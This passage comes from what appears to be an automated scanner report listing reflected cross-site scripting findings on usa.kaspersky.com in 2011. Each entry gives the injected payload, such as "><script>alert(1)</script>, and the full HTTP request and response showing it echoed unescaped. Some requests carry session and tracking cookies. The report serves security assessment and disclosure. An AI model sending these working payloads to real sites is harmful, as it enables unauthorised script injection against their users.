Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145510"
Content-Type: text/html; charset=utf-8
Content-Length: 39750
Date: Sun, 04 Sep 2011 14:11:58 GMT
X-Varnish: 1163258422
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
rop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-services4e87a"-alert(1)-"63b94f304e1/home-computer-security/index.html";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.103. http://usa.kaspersky.com/products-services/home-computer-security/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 482c7"><script>alert(1)</script>ca326f1366e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/home-computer-security482c7"><script>alert(1)</script>ca326f1366e/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:12:26 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145546"
Content-Type: text/html; charset=utf-8
Content-Length: 36846
Date: Sun, 04 Sep 2011 14:12:41 GMT
X-Varnish: 1163259929
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-security482c7"><script>alert(1)</script>ca326f1366e/index.html" />
...[SNIP]...

1.104. http://usa.kaspersky.com/products-services/home-computer-security/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/index.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42846"-alert(1)-"1737ec5e156 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /products-services/home-computer-security42846"-alert(1)-"1737ec5e156/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:12:49 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145569"
Content-Type: text/html; charset=utf-8
Content-Length: 40168
Date: Sun, 04 Sep 2011 14:12:53 GMT
X-Varnish: 1163260724
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-services/home-computer-security42846"-alert(1)-"1737ec5e156/index.html";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.105. http://usa.kaspersky.com/products-services/home-computer-security/index.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28525"><script>alert(1)</script>9ade6974e30 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/home-computer-security/index.html28525"><script>alert(1)</script>9ade6974e30 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:13:05 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145585"
Content-Type: text/html; charset=utf-8
Content-Length: 38111
Date: Sun, 04 Sep 2011 14:13:09 GMT
X-Varnish: 1163261437
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-security/index.html28525"><script>alert(1)</script>9ade6974e30" />
...[SNIP]...

1.106. http://usa.kaspersky.com/products-services/home-computer-security/index.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/index.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62dbd"-alert(1)-"91cf1275c68 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /products-services/home-computer-security/index.html62dbd"-alert(1)-"91cf1275c68 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:13:19 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145599"
Content-Type: text/html; charset=utf-8
Content-Length: 39901
Date: Sun, 04 Sep 2011 14:13:23 GMT
X-Varnish: 1163262189
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
= s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-services/home-computer-security/index.html62dbd"-alert(1)-"91cf1275c68";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.107. http://usa.kaspersky.com/products-services/home-computer-security/index.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 784c6"><script>alert(1)</script>ea35560650 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/home-computer-security/index.html?784c6"><script>alert(1)</script>ea35560650=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:07:35 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145255"
Content-Type: text/html; charset=utf-8
Content-Length: 41860
Date: Sun, 04 Sep 2011 14:07:40 GMT
X-Varnish: 1163248752
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-security/index.html?784c6"><script>alert(1)</script>ea35560650=1" />
...[SNIP]...

1.108. http://usa.kaspersky.com/products-services/home-computer-security/index.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50061"-alert(1)-"b1568a13e65 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /products-services/home-computer-security/index.html?50061"-alert(1)-"b1568a13e65=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:08:14 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145294"
Content-Type: text/html; charset=utf-8
Content-Length: 41544
Date: Sun, 04 Sep 2011 14:08:22 GMT
X-Varnish: 1163250385
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-services/home-computer-security/index.html?50061"-alert(1)-"b1568a13e65=1";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.109. http://usa.kaspersky.com/products-services/home-computer-security/internet-security [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/internet-security

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ed40"><script>alert(1)</script>c411af10f77 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services3ed40"><script>alert(1)</script>c411af10f77/home-computer-security/internet-security HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; NO_CACHE=Y; s_cc=true; intcamp=INT1673886; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.3.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); slider_session=yes; gpv_pageName=Search%20%7C%20Search%20Results; ev5=xss; s_nr=1315139065855-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253DSearch%2526oidt%253D3%2526ot%253DSUBMIT; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:05:34 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141534"
Content-Type: text/html; charset=utf-8
Content-Length: 40589
Date: Sun, 04 Sep 2011 13:05:46 GMT
X-Varnish: 1163120586
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services3ed40"><script>alert(1)</script>c411af10f77/home-computer-security/internet-security" />
...[SNIP]...

1.110. http://usa.kaspersky.com/products-services/home-computer-security/internet-security [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/internet-security

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc970"-alert(1)-"d7b46699d0c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /products-servicesfc970"-alert(1)-"d7b46699d0c/home-computer-security/internet-security HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; NO_CACHE=Y; s_cc=true; intcamp=INT1673886; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.3.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); slider_session=yes; gpv_pageName=Search%20%7C%20Search%20Results; ev5=xss; s_nr=1315139065855-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253DSearch%2526oidt%253D3%2526ot%253DSUBMIT; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:06:06 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141566"
Content-Type: text/html; charset=utf-8
Content-Length: 40884
Date: Sun, 04 Sep 2011 13:06:17 GMT
X-Varnish: 1163121831
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
rop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-servicesfc970"-alert(1)-"d7b46699d0c/home-computer-security/internet-security";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.111. http://usa.kaspersky.com/products-services/home-computer-security/internet-security [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/internet-security

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7a80"><script>alert(1)</script>c1160999181 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/home-computer-securityb7a80"><script>alert(1)</script>c1160999181/internet-security HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; NO_CACHE=Y; s_cc=true; intcamp=INT1673886; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.3.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); slider_session=yes; gpv_pageName=Search%20%7C%20Search%20Results; ev5=xss; s_nr=1315139065855-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253DSearch%2526oidt%253D3%2526ot%253DSUBMIT; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:08:39 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141719"
Content-Type: text/html; charset=utf-8
Content-Length: 40946
Date: Sun, 04 Sep 2011 13:08:54 GMT
X-Varnish: 1163126343
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-securityb7a80"><script>alert(1)</script>c1160999181/internet-security" />
...[SNIP]...

1.112. http://usa.kaspersky.com/products-services/home-computer-security/internet-security [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/internet-security

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75ac9"-alert(1)-"44655643b9d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /products-services/home-computer-security75ac9"-alert(1)-"44655643b9d/internet-security HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; NO_CACHE=Y; s_cc=true; intcamp=INT1673886; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.3.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); slider_session=yes; gpv_pageName=Search%20%7C%20Search%20Results; ev5=xss; s_nr=1315139065855-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253DSearch%2526oidt%253D3%2526ot%253DSUBMIT; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:09:40 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141780"
Content-Type: text/html; charset=utf-8
Content-Length: 40617
Date: Sun, 04 Sep 2011 13:09:50 GMT
X-Varnish: 1163128122
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-services/home-computer-security75ac9"-alert(1)-"44655643b9d/internet-security";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.113. http://usa.kaspersky.com/products-services/home-computer-security/internet-security [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/internet-security

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60faf"-alert(1)-"aea51866174 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /products-services/home-computer-security/internet-security60faf"-alert(1)-"aea51866174 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; NO_CACHE=Y; s_cc=true; intcamp=INT1673886; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.3.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); slider_session=yes; gpv_pageName=Search%20%7C%20Search%20Results; ev5=xss; s_nr=1315139065855-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253DSearch%2526oidt%253D3%2526ot%253DSUBMIT; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:11:29 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141889"
Content-Type: text/html; charset=utf-8
Content-Length: 40681
Date: Sun, 04 Sep 2011 13:11:34 GMT
X-Varnish: 1163130845
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
p4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-services/home-computer-security/internet-security60faf"-alert(1)-"aea51866174";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.114. http://usa.kaspersky.com/products-services/home-computer-security/internet-security [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/internet-security

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75d19"><script>alert(1)</script>e6a94cf142d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/home-computer-security/internet-security75d19"><script>alert(1)</script>e6a94cf142d HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; NO_CACHE=Y; s_cc=true; intcamp=INT1673886; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.3.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); slider_session=yes; gpv_pageName=Search%20%7C%20Search%20Results; ev5=xss; s_nr=1315139065855-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253DSearch%2526oidt%253D3%2526ot%253DSUBMIT; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:11:10 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141870"
Content-Type: text/html; charset=utf-8
Content-Length: 41010
Date: Sun, 04 Sep 2011 13:11:16 GMT
X-Varnish: 1163130444
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-security/internet-security75d19"><script>alert(1)</script>e6a94cf142d" />
...[SNIP]...

1.115. http://usa.kaspersky.com/products-services/home-computer-security/internet-security [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/internet-security

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d3d5"><script>alert(1)</script>0c315f9bb81 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/home-computer-security/internet-security?6d3d5"><script>alert(1)</script>0c315f9bb81=1 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; NO_CACHE=Y; s_cc=true; intcamp=INT1673886; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.3.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); slider_session=yes; gpv_pageName=Search%20%7C%20Search%20Results; ev5=xss; s_nr=1315139065855-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253DSearch%2526oidt%253D3%2526ot%253DSUBMIT; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5

Response

HTTP/1.1 200 OK
Server: Apache
